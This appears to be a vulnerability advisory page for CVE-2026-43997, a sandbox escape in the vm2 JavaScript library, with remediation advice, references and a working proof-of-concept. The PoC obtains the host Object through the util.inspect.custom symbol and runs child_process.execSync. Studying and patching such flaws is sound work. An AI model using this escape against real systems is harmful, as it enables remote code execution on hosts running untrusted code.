CVE-2026-43997

Description

### Summary It is possible to obtain the host `Object`, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete. ### Details There are various ways to use the host `Object`, to escape the sandbox, one example would be using `HostObject.getOwnPropertySymbols` to obtain `Symbol(nodejs.util.inspect.custom)` ### PoC ```js const g = {}.__lookupGetter__; const a = Buffer.apply; const p = a.apply(g, [Buffer, ['__proto__']]); const o = p.call(p.call(a)); const HObject = o.constructor; sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0); const obj = { [sym]: (depth, opt, inspect) => { inspect.constructor("return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})")(); }, valueOf: undefined, constructor: undefined, }; WebAssembly.compileStreaming(obj).catch(() => {}); ``` ### Impact Sandbox Escape -> RCE

How to fix CVE-2026-43997

To remediate CVE-2026-43997, upgrade the affected package to a fixed version below.

• —upgrade to 3.11.0 or later

Is CVE-2026-43997 being exploited?

Low — EPSS is 0.0%, meaning exploitation activity has not been observed at scale.

Affected packages (1)

• from 0, < 3.11.0

CVSS scores

References (4)

• ADVISORYnvd.nist.gov/vuln/detail/CVE-2026-43997
• PATCHgithub.com/patriksimek/vm2
• WEBgithub.com/patriksimek/vm2/releases/tag/v3.11.0
• WEBgithub.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6